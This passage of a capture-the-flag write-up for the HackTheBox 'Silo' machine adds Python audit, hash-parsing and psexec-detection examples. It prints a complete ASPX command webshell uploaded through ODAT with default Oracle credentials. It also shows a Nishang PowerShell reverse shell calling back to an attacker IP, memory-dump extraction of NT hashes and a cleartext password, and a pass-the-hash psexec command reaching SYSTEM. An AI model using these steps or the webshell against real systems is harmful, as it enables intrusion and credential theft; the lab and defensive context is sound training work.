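    mode = cx_Oracle.SYSDBA if sysdba else cx_Oracle.DEFAULT_AUTH
    conn = cx_Oracle.connect(user=user, password=password, dsn=dsn, mode=mode)
    try:
        cur = conn.cursor()
        results = {}
        for name, sql in QUERIES.items():
            cur.execute(sql)
            results[name] = cur.fetchall()
    finally:
        conn.close()
    return evaluate(results)


# Constructed sample rows mirroring what the walkthrough found: SCOTT open with
# the default password, SCOTT able to connect AS SYSDBA (assumed here to be a
# password-file entry), PUBLIC EXECUTE on two packages ODAT flagged, and a
# directory object with the hypothetical name WEBROOT_DIR under C:\inetpub\wwwroot.
SAMPLE_RESULTS = {
    "default_accounts": [("SCOTT", "OPEN"), ("HR", "EXPIRED & LOCKED"), ("SYS", "OPEN")],
    "pwfile_users": [("SYS", "TRUE", "TRUE"), ("SCOTT", "TRUE", "FALSE")],
    "public_execute": [("PUBLIC", "DBMS_XSLPROCESSOR"), ("PUBLIC", "UTL_FILE"),
                       ("PUBLIC", "DBMS_OUTPUT")],
    "directories": [("DATA_PUMP_DIR", "C:\\oraclexe\\dpdump\\"),
                    ("WEBROOT_DIR", "C:\\inetpub\\wwwroot\\")],
}

if __name__ == "__main__":
    for found, fix in evaluate(SAMPLE_RESULTS):
        print(f"[!] {found}\n    fix: {fix}")
```

Against a live instance call run_audit("10.10.10.82:1521/XE", user, password, sysdba=True) with a DBA account; the fixes are suggestions to review, not statements the script executes.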

If you refer to the ODAT GitHub page (odat_mind_map_v1.0.jpg in quentinhardy/odat) it will show the functionalities available. Let's use these available functions to upload the file (reverse shell).

I have tried .txt and .php file upload and found .txt upload works, and using the multiple extensions upload, I could see only aspx works. However the ASPX reverse shell code from msfvenom contains a large number of characters. I am using the local aspx shell from Kali. This also needs to be formatted a little bit. The actual shell can be found here.
└─$ locate cmdasp
/home/rocky/hckbox/Bounty/cmdasp.aspx
/home/rocky/hckbox/granny/cmdasp.aspx
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmdasp.aspx
1400 cmdasp.aspx
After formatting I have uploaded the test shell (cmdnew.aspx in tcprks/Rchitect on GitHub) here.
└─$ cat cmdasp.aspx | tr -d '\n'
<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><HEAD><title>awen asp.net webshell</title></HEAD><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label></form></body></HTML><!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --><!-- http://michaeldaw.org 04/2007 -->
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cat cmdasp.aspx | tr -d '\n' > cmd.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmd.aspx
1358 cmd.aspx
Upload now using the command format below:
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ./odat.py dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "rchitect.aspx" "/home/rocky/hckbox/silo/rchitect.aspx"
07:54:03 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Put the /home/rocky/hckbox/silo/rchitect.aspx local file in the C:\inetpub\wwwroot\ path (named rchitect.aspx) of the 10.10.10.82 server
[+] The /home/rocky/hckbox/silo/rchitect.aspx local file was put in the remote C:\inetpub\wwwroot\ path (named rchitect.aspx)
I can access the cmd shell from the browser.

Let's use Nishang's PowerShell script for reverse shell access:

$ tail -1 Invoke-PowerShellTcp.ps1
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ tail -5 Invoke-PowerShellTcp.ps1
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.82 - - [25/Feb/2022 08:29:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.82] 49168
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>
I got the user flag as well:
cd Phineas
cd Desktop
dir
Directory: C:\users\Phineas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 1/5/2018 10:56 PM 300 Oracle issue.txt
-ar-- 2/25/2022 12:43 AM 34 user.txt
I can see one more file:
get-content "oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
It seems the password does not work while I try to download. After searching some forums, I found that the password needs to be copied from the Windows machine to Linux using the copy option. You can see you are missing some characters or symbols while copying it the earlier way. Refer to the file which has been copied to Kali. Open it with Vim and you will get the password.

After unzipping it becomes a 1 GB file; if you have space constraints, use an SMB share to access it.

There is a tool, Volatility, to analyze the memory dump. However, in previous blog posts it was Volatility 2, which was working with Python 2; after searching I found Volatility 3, which works with Python 3.
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
python3 setup.py install
python3 vol.py —h
Cloning into 'volatility3'...
remote: Enumerating objects: 26002, done.
remote: Counting objects: 100% (3001/3001), done.
remote: Compressing objects: 100% (1021/1021), done.
remote: Total 26002 (delta 2253), reused 2596 (delta 1968), pack-reused 23001
Receiving objects: 100% (26002/26002), 5.14 MiB | 200.00 KiB/s, done.
Volatility 3 Framework 2.0.2
usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]] [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG] [-o OUTPUT_DIR] [-q]
[-r RENDERER] [-f FILE] [--write-config] [--clear-cache] [--cache-path CACHE_PATH] [--offline] [--single-location SINGLE_LOCATION]
[--stackers [STACKERS ...]] [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]
plugin ...
volatility: error: argument plugin: invalid choice —h (choose from banners.Banners, configwriter.ConfigWriter, frameworkinfo.FrameworkInfo, isfinfo.IsfInfo, layerwriter.LayerWriter, linux.bash.Bash, linux.check_afinfo.Check_afinfo, linux.check_creds.Check_creds, linux.check_idt.Check_idt, linux.check_modules.Check_modules, linux.check_syscall.Check_syscall, linux.elfs.Elfs, linux.keyboard_notifiers.Keyboard_notifiers, linux.kmsg.Kmsg, linux.lsmod.Lsmod, linux.lsof.Lsof, linux.malfind.Malfind, linux.proc.Maps, linux.pslist.PsList, linux.pstree.PsTree, linux.tty_check.tty_check, mac.bash.Bash, mac.check_syscall.Check_syscall, mac.check_sysctl.Check_sysctl, mac.check_trap_table.Check_trap_table, mac.ifconfig.Ifconfig, mac.kauth_listeners.Kauth_listeners, mac.kauth_scopes.Kauth_scopes, mac.kevents.Kevents, mac.list_files.List_Files, mac.lsmod.Lsmod, mac.lsof.Lsof, mac.malfind.Malfind, mac.mount.Mount, mac.netstat.Netstat, mac.proc_maps.Maps, mac.psaux.Psaux, mac.pslist.PsList, mac.pstree.PsTree, mac.socket_filters.Socket_filters, mac.timers.Timers, mac.trustedbsd.Trustedbsd, mac.vfsevents.VFSevents, timeliner.Timeliner, windows.bigpools.BigPools, windows.cachedump.Cachedump, windows.callbacks.Callbacks, windows.cmdline.CmdLine, windows.crashinfo.Crashinfo, windows.dlllist.DllList, windows.driverirp.DriverIrp, windows.driverscan.DriverScan, windows.dumpfiles.DumpFiles, windows.envars.Envars, windows.filescan.FileScan, windows.getservicesids.GetServiceSIDs, windows.getsids.GetSIDs, windows.handles.Handles, windows.hashdump.Hashdump, windows.info.Info, windows.ldrmodules.LdrModules, windows.lsadump.Lsadump, windows.malfind.Malfind, windows.memmap.Memmap, windows.mftscan.MFTScan, windows.modscan.ModScan, windows.modules.Modules, windows.mutantscan.MutantScan, windows.netscan.NetScan, windows.netstat.NetStat, windows.poolscanner.PoolScanner, windows.privileges.Privs, windows.pslist.PsList, windows.psscan.PsScan, windows.pstree.PsTree, 
windows.registry.certificates.Certificates, windows.registry.hivelist.HiveList, windows.registry.hivescan.HiveScan, windows.registry.printkey.PrintKey, windows.registry.userassist.UserAssist, windows.sessions.Sessions, windows.skeleton_key_check.Skeleton_Key_Check, windows.ssdt.SSDT, windows.statistics.Statistics, windows.strings.Strings, windows.svcscan.SvcScan, windows.symlinkscan.SymlinkScan, windows.vadinfo.VadInfo, windows.vadyarascan.VadYaraScan, windows.verinfo.VerInfo, windows.virtmap.VirtMap, yarascan.YaraScan)
Let's search for the command format for Vol3. Some commands I have tried and their results are uploaded [here](Rchitect/vol3-output at Yoda · tcprks/Rchitect · GitHub).
python3 vol.py -f /home/rocky/hckbox/silo/dump/SILO-20180105-221806.dmp windows.pslist.PsList
Volatility 3 Framework 2.0.2
python3 vol.py -f /home/rocky/hckbox/silo/dump/SILO-20180105-221806.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.0-beta.1
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished
User rid lmhash nthash
Administrator 500 aad3b435b51404eeaad3b435b51404ee 9e730375b7cbcebf74ae46481e07b0c7
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002 aad3b435b51404eeaad3b435b51404ee 8eacdd67b77749e65d3b3d5c110b0969
Volatility: command not found
┌──(rocky㉿kali)-[~/tool/exp/volatility3]
└─$ python3 vol.py -f /home/rocky/hckbox/silo/dump/SILO-20180105-221806.dmp windows.lsadump.Lsadump
Volatility 3 Framework 2.0.2
Progress: 100.00 PDB scanning finished
Key Secret Hex
DefaultPassword DoNotH@ckMeBro! 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00
DPAPI_SYSTEM ,Ï%14®C-¬ò§tmC¨¦©Bb÷UpH»}þyI½ 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00
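The two Volatility outputs above carry more information than the raw hashes, so here is an added example (not code from the walkthrough or from Volatility) that reads them the way an analyst writing up the host would. The strings are the page's own hashdump and lsadump output; the blob layout used for the Hex column (4-byte little-endian length, 12 reserved bytes, then the payload) is an assumption taken from the bytes printed for DefaultPassword and is checked against the declared length.

```python
# Added example (not from the walkthrough): parse the two Volatility 3 outputs
# shown above and flag what they mean for the host.
# The strings below are the page's own hashdump and lsadump output; the blob
# layout (4-byte length, 12 reserved bytes, payload) is assumed from the hex
# printed by windows.lsadump.Lsadump and verified against the declared length.
HASHDUMP_OUTPUT = """\
User rid lmhash nthash
Administrator 500 aad3b435b51404eeaad3b435b51404ee 9e730375b7cbcebf74ae46481e07b0c7
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002 aad3b435b51404eeaad3b435b51404ee 8eacdd67b77749e65d3b3d5c110b0969
"""

# Hex column of the DefaultPassword secret exactly as lsadump printed it.
DEFAULT_PASSWORD_HEX = (
    "1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 "
    "42 00 72 00 6f 00 21 00 00 00"
)

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string: LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def parse_hashdump(text: str) -> list:
    """Turn the hashdump table into records with two analyst flags per account."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split()
        if len(parts) != 4:
            continue
        user, rid, lm, nt = parts
        rows.append({
            "user": user,
            "rid": int(rid),
            "lm_disabled": lm.lower() == EMPTY_LM,     # good: no LM hash stored
            "blank_password": nt.lower() == EMPTY_NT,  # bad unless the account is disabled
        })
    return rows


def parse_lsa_secret(hex_text: str) -> tuple:
    """Split a decrypted LSA secret blob into (declared length, payload bytes)."""
    raw = bytes.fromhex(hex_text)
    length = int.from_bytes(raw[:4], "little")
    payload = raw[16:16 + length]               # 12 reserved bytes follow the length
    if len(payload) != length:
        raise ValueError(f"blob truncated: declared {length}, got {len(payload)} bytes")
    return length, payload


def decode_default_password(hex_text: str) -> str:
    """DefaultPassword is the Winlogon auto-logon password, stored as UTF-16LE."""
    _, payload = parse_lsa_secret(hex_text)
    return payload.decode("utf-16-le")


def findings(hashdump_text: str, default_password_hex: str) -> list:
    """Plain-language findings for the report."""
    notes = []
    for row in parse_hashdump(hashdump_text):
        if row["blank_password"]:
            notes.append(f"{row['user']} (RID {row['rid']}) has a blank password")
        if not row["lm_disabled"]:
            notes.append(f"{row['user']} still has an LM hash stored")
    if default_password_hex:
        notes.append("DefaultPassword secret present: auto-logon is configured with a "
                     f"cleartext password of {len(decode_default_password(default_password_hex))} characters")
    return notes


if __name__ == "__main__":
    for note in findings(HASHDUMP_OUTPUT, DEFAULT_PASSWORD_HEX):
        print("-", note)
```

The two hash constants are worth memorising: every account here has the empty-string LM hash, which just means LM hashes are not stored (expected on a 2012 R2 host), while Guest's NT hash is that of an empty password. The DefaultPassword secret is the real finding for the system owner: Winlogon auto-logon keeps that password in cleartext, so it is recoverable from any memory dump or registry backup of the machine.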
Now we have the hashes. Without trying to crack them, I decided to use a tool that can give a shell using the hashes directly (pass-the-hash):

┌──(rocky㉿kali)-[~]
└─$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -dc-ip 10.10.10.82 administrator@10.10.10.82
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file MfWYdRtt.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service suTU on 10.10.10.82.....
[*] Starting service suTU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
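The psexec.py output above is a very recognisable pattern on the target side: a random-named executable uploaded to ADMIN$, then a new service created to run it from the Windows root. As an added example (not code from the walkthrough or from Impacket), here is detection logic that correlates those two steps. The events are constructed in a simplified key/value form, reusing the file and service names the page shows; on a real host the same fields come from Security event 5145 (network share object access) and System event 7045 (service installed).

```python
from datetime import datetime
import ntpath

# Added example (not from the walkthrough): detection logic for the remote
# service-execution pattern visible in the psexec.py output above (upload of a
# random-named .exe to ADMIN$, then a service created to run it). The events
# below are constructed in a simplified key/value form, reusing the file and
# service names from the page; real data would come from Security 5145 and
# System 7045 events.
SAMPLE_EVENTS = [
    {"time": "2022-02-25T08:40:01", "id": 5145, "share": r"\\*\ADMIN$",
     "target": "MfWYdRtt.exe", "access": "WriteData", "src_ip": "10.10.14.12"},
    {"time": "2022-02-25T08:40:02", "id": 7045, "service": "suTU",
     "image": r"%SystemRoot%\MfWYdRtt.exe"},
    # benign: a service whose binary lives under system32, with no prior ADMIN$ write
    {"time": "2022-02-25T09:00:00", "id": 7045, "service": "Sense",
     "image": r'"%SystemRoot%\system32\svchost.exe" -k netsvcs'},
]

WINDOWS_ROOT = r"c:\windows"   # the directory ADMIN$ maps to


def image_path(image: str) -> str:
    """Extract the executable path from a service ImagePath (quoted or not)."""
    image = image.strip()
    if image.startswith('"'):
        exe = image[1:image.find('"', 1)]
    else:
        exe = image.split()[0]
    return exe.replace("%SystemRoot%", r"C:\Windows").replace("%systemroot%", r"C:\Windows")


def in_windows_root(image: str) -> bool:
    """True when the service binary sits directly in C:\\Windows rather than a subfolder."""
    return ntpath.dirname(image_path(image)).lower() == WINDOWS_ROOT


def detect_remote_service_exec(events: list, window_seconds: int = 300) -> list:
    """Correlate ADMIN$ writes with later service installs that run the written file."""
    writes = {}
    for ev in events:
        if ev["id"] == 5145 and ev["share"].upper().endswith("ADMIN$") and "WriteData" in ev["access"]:
            writes[ev["target"].lower()] = ev
    alerts = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        exe = ntpath.basename(image_path(ev["image"])).lower()
        reasons = []
        if in_windows_root(ev["image"]):
            reasons.append("service binary placed directly in the Windows root")
        written = writes.get(exe)
        if written:
            delta = (datetime.fromisoformat(ev["time"])
                     - datetime.fromisoformat(written["time"])).total_seconds()
            if 0 <= delta <= window_seconds:
                reasons.append(f"same file written to ADMIN$ from {written['src_ip']} {delta:.0f}s earlier")
        if reasons:
            alerts.append({"service": ev["service"], "binary": exe, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_service_exec(SAMPLE_EVENTS):
        print(alert["service"], alert["binary"], "->", "; ".join(alert["reasons"]))
```

The ADMIN$ write on its own is weak evidence (administrators copy files there too), and a binary in the Windows root is only unusual; the two together within a few seconds, from a workstation address, is the signal worth paging on. Note that 5145 only exists when object access auditing for file shares is enabled, which is the one configuration change this detection depends on.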
Key Take-aways
The initial nmap scan I used did not reveal the Oracle database ports. I spent more time on other services which are not relevant; in OSCP this can waste your time. Always run a manual scan (sudo nmap -sS -T4 -sV -sC 10.10.10.82) and automatic enumeration scripts like AutoRecon during exams and pentesting.
Another learning from this box is the Oracle DB exploit: how TNS poisoning can be used for Oracle DB exploitation. We got to know about the ODAT tool, which can be used for DB enumeration and which helped to get the initial shell. For privilege escalation, we learned how to use Volatility to analyze a memory dump file to get sensitive information about servers/systems.